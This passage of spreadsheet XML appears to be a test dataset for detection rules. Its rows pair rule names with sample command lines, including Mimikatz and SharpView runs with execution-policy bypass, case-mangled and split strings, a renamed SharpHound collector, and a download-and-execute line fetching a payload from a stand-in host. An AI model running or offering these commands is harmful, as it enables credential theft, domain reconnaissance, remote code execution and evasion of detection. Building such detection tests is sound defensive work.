          <t>powershell.exe -nOprOFILe -ep Bypass -c "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F1318" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1318" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1318" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1318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18" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1318" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1319" ht="15.75" customHeight="1" s="42">
      <c r="A1319" s="43" t="n"/>
      <c r="B1319" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1319" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1319" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1319" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop -ep Bypass -CommaNd "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F1319" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1319" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1319" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1319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19" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1319" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1320" ht="15.75" customHeight="1" s="42">
      <c r="A1320" s="43" t="n"/>
      <c r="B1320" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_where_browser_data_recon</t>
        </is>
      </c>
      <c r="C1320" s="36" t="inlineStr">
        <is>
          <t>Suspicious Where Execution</t>
        </is>
      </c>
      <c r="D1320" s="36" t="inlineStr">
        <is>
          <t>725a9768-0f5e-4cb3-aec2-bc5719c6831a</t>
        </is>
      </c>
      <c r="E1320" s="36" t="inlineStr">
        <is>
          <t>where /R C:\Users\ *ookmarks</t>
        </is>
      </c>
      <c r="F1320" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1320" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1320" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1320" s="43" t="n"/>
      <c r="J1320" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1320" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1321" ht="15.75" customHeight="1" s="42">
      <c r="A1321" s="43" t="n"/>
      <c r="B1321" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C1321" s="36" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D1321" s="36" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E1321" s="36" t="inlineStr">
        <is>
          <t>copy SharpHound.exe not_suspicious.exe; .\not_suspicious.exe --collectionmethods="All" --domain "contoso.local"</t>
        </is>
      </c>
      <c r="F1321" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1321" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1321" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1321" s="36" t="n"/>
      <c r="J1321" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1321" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1322" ht="15.75" customHeight="1" s="42">
      <c r="A1322" s="43" t="n"/>
      <c r="B1322" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C1322" s="36" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D1322" s="36" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E1322" s="36" t="inlineStr">
        <is>
          <t>copy SharpHound.exe not_suspicious.exe; .\not_suspicious.exe --collectionmethods "Default" --domain "contoso.local" --zipfilename:"data.zip"</t>
        </is>
      </c>
      <c r="F1322" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1322" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1322" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1322" s="36" t="n"/>
      <c r="J1322" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1322" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1323" ht="15.75" customHeight="1" s="42">
      <c r="A1323" s="43" t="n"/>
      <c r="B1323" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C1323" s="36" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D1323" s="36" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E1323" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" SharpHound.exe -jsOnFolDEr C:\temp /"ZipFileName" C:\temp\sharphound.zip</t>
        </is>
      </c>
      <c r="F1323" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1323" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1323" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1323" s="43" t="n"/>
      <c r="J1323" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1323" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1324" ht="15.75" customHeight="1" s="42">
      <c r="A1324" s="43" t="n"/>
      <c r="B1324" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1324" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1324" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1324" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\Notepad.exe</t>
        </is>
      </c>
      <c r="F1324" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1324" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1324" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1324" s="43" t="n"/>
      <c r="J1324" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1324" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1325" ht="15.75" customHeight="1" s="42">
      <c r="A1325" s="43" t="n"/>
      <c r="B1325" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1325" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1325" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1325" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F1325" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1325" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1325" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1325" s="43" t="n"/>
      <c r="J1325" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1325" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1326" ht="15.75" customHeight="1" s="42">
      <c r="A1326" s="43" t="n"/>
      <c r="B1326" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1326" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1326" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1326" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F1326" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1326" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1326" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1326" s="43" t="n"/>
      <c r="J1326" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1326" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1327" ht="15.75" customHeight="1" s="42">
      <c r="A1327" s="43" t="n"/>
      <c r="B1327" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1327" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1327" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1327" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmaNd "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F1327" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1327" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1327" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1327" s="36" t="n"/>
      <c r="J1327" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1327" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1328" ht="15.75" customHeight="1" s="42">
      <c r="A1328" s="43" t="n"/>
      <c r="B1328" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1328" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1328" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1328" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMMand "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F1328" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1328" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1328" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1328" s="36" t="n"/>
      <c r="J1328" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1328" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1329" ht="15.75" customHeight="1" s="42">
      <c r="A1329" s="43" t="n"/>
      <c r="B1329" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1329" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1329" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1329" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMmAND "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F1329" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1329" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1329" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1329" s="43" t="n"/>
      <c r="J1329" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1329" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1330" ht="15.75" customHeight="1" s="42">
      <c r="A1330" s="43" t="n"/>
      <c r="B1330" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1330" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1330" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1330" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F1330" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1330" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1330" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1330" s="36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30" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1330" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1331" ht="15.75" customHeight="1" s="42">
      <c r="A1331" s="43" t="n"/>
      <c r="B1331" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1331" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1331" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1331" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nOprOFILe -ep Bypass -c "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F1331" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1331" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1331" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1331" s="36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31" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1331" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1332" ht="15.75" customHeight="1" s="42">
      <c r="A1332" s="43" t="n"/>
      <c r="B1332" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1332" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1332" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1332" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop -ep Bypass -CommaNd "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F1332" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1332" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1332" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1332" s="36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332" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1332" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1333" ht="15.75" customHeight="1" s="42">
      <c r="A1333" s="43" t="n"/>
      <c r="B1333" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1333" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1333" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1333" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F1333" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1333" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1333" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1333" s="36" t="n"/>
      <c r="J1333" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1333" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1334" ht="15.75" customHeight="1" s="42">
      <c r="A1334" s="43" t="n"/>
      <c r="B1334" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1334" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1334" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1334" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F1334" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1334" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1334" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1334" s="36" t="n"/>
      <c r="J1334" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1334" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1335" ht="15.75" customHeight="1" s="42">
      <c r="A1335" s="43" t="n"/>
      <c r="B1335" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1335" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1335" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1335" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -C "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F1335" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1335" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1335" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1335" s="43" t="n"/>
      <c r="J1335" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1335" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1336" ht="15.75" customHeight="1" s="42">
      <c r="A1336" s="43" t="n"/>
      <c r="B1336" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1336" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1336" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1336" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1336" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1336" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1336" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I133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336" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1336" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1337" ht="15.75" customHeight="1" s="42">
      <c r="A1337" s="43" t="n"/>
      <c r="B1337" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1337" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1337" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1337" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eXeCuTioNpOLICY Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1337" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1337" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1337" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I133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337" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1337" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1338" ht="15.75" customHeight="1" s="42">
      <c r="A1338" s="43" t="n"/>
      <c r="B1338" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1338" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1338" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1338" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1338" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1338" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1338" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I133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338" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1338" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1339" ht="15.75" customHeight="1" s="42">
      <c r="A1339" s="43" t="n"/>
      <c r="B1339" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1339" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1339" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1339" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1339" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1339" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1339" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1339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339" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1339" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1340" ht="15.75" customHeight="1" s="42">
      <c r="A1340" s="43" t="n"/>
      <c r="B1340" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1340" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1340" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1340" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eXECutIoNpolIcy Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1340" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1340" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1340" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1340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Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1340" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1340" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1341" ht="15.75" customHeight="1" s="42">
      <c r="A1341" s="43" t="n"/>
      <c r="B1341" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1341" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1341" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1341" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -cOmmAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1341" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1341" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1341" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I134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341" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1341" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1342" ht="15.75" customHeight="1" s="42">
      <c r="A1342" s="43" t="n"/>
      <c r="B1342" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1342" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1342" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1342" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMMaND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1342" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1342" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1342" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I134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342" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1342" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1343" ht="15.75" customHeight="1" s="42">
      <c r="A1343" s="43" t="n"/>
      <c r="B1343" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1343" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1343" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1343" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1343" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1343" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1343" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1343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343" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1343" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1344" ht="15.75" customHeight="1" s="42">
      <c r="A1344" s="43" t="n"/>
      <c r="B1344" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1344" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1344" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1344" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -nOnINterACTIVe -ep Bypass -COMmAnD "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1344" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1344" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1344" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1344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344" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1344" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1345" ht="15.75" customHeight="1" s="42">
      <c r="A1345" s="43" t="n"/>
      <c r="B1345" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1345" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1345" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1345" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -nONInteRAcTIvE -exeCUtiOnpoLICy Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1345" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1345" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1345" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1345" s="36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345" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1345" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1346" ht="15.75" customHeight="1" s="42">
      <c r="A1346" s="43" t="n"/>
      <c r="B1346" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1346" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1346" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1346" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1346" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1346" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1346" s="36" t="b">
